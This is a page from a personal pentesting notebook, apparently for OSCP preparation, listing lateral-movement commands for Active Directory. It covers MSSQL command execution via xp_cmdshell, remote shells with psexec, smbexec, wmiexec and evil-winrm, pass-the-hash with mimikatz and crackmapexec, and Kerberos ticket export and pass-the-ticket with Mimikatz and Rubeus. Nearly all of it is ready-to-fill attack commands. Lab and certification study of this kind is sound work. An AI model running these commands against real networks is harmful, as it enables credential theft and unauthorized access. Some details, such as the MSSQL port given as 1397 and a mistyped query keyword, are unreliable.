M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • MSSQL (Port 1397)
  • Find mssql access
  • Users with SQLAdmin (BloodHound)
  • Trust Link
  • Log in
  • Local User
  • ClearText Password
  • Interactive Shell
  • Pseudo-shell (file write and read)
  • Protocols
  • NTLM Hash
  • Pass the Hash (PTH)
  • Pass the Key (PTK)
  • Kerberos
  • Pass the Ticket (ccache / kirbi)
  1. NOTES
  2. ACTIVE DIRECTORY

Lateral Move

MSSQL (Port 1397)

Find mssql access

cme mssql <ip> -u <user> -p <password> -d <domain>

Users with SQLAdmin (BloodHound)

MATC p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p

Trust Link

Get-SQLServerLinkCrawl -username <user> -password <password> -Verbose -Instance <sqlInstance> -Query "<query>"
use exploit/windows

Log in

mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
enum_db
xp_cmdshell <cmd>
exec_as_user <user>

exec_as_login <login>
sp_linkedservers

use_link

Local User

cme smb -u <user> -p <password> <ip> --local-auth
impacket like cleartext password without domain/

ClearText Password

Interactive Shell

psexec.py <domain>/<user>:<password>@ip
psexec.exe -AcceptEULA \\<ip>
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"

Pseudo-shell (file write and read)

smbexec.py <domain>/<user>:<password>@<ip> "command"
wmiexec.py <domain>/<user>:<password>@<ip>
crackmapexec smb <ip_range> -u <user> -p <password> -d <domain>

crackmapexec smb <ip_range> -u <user> -p <password> -local-auth

Protocols

evil-winrm -i <ip> -u <user> -p <password>
evil-winrm -i <ip> -c cert.pem -k key.pem -S
xfreerdp /u:<user> /p:<password> /v:<ip>
smbclient.py <domain>/<user>:<password>@<ip>
cme mssql <ip_range> -u <user> -p <password> -d <domain>
impacket-mssqlclient <user>@<ip> -windows-auth
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

NTLM Hash

Pass the Hash (PTH)

Interactive Shell

psexec.py -hashes ":<hash>" <user>@ip
psexec.exe -AcceptEULA \\<ip>
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"

Pseudo-shell (file write and read)

smbexec.py -hashes ":<hash>" <user>@<ip> "command"
wmiexec.py -hashes ":<hash>" <user>@<ip>
crackmapexec smb <ip_range> -u <user> -d <domain> -H ":<hash>"

crackmapexec smb <ip_range> -u <user> -H ":<hash>" -local-auth

Protocols

evil-winrm -i <ip> -u <user> -H <hash>
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
smbclient.py -hashes ":<hash>" <user>@<ip>
cme mssql <ip_range> -H ":<hash>"
mssqlclient.py -windows-auth -hashes ":<hash>" <domain>/<user>@<ip>

Pass the Key (PTK)

Kerberos

Pass the Ticket (ccache / kirbi)

mimikatz kerberos::ptc "<ticket>"

Export the TGS ticket

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command ‘"kerberos::ptt <ticket>"’

Rubeus.exe ptt /ticket:<ticket>

PreviousValid CredentialsNextACLs/ACEs permissions

Last updated 3 months ago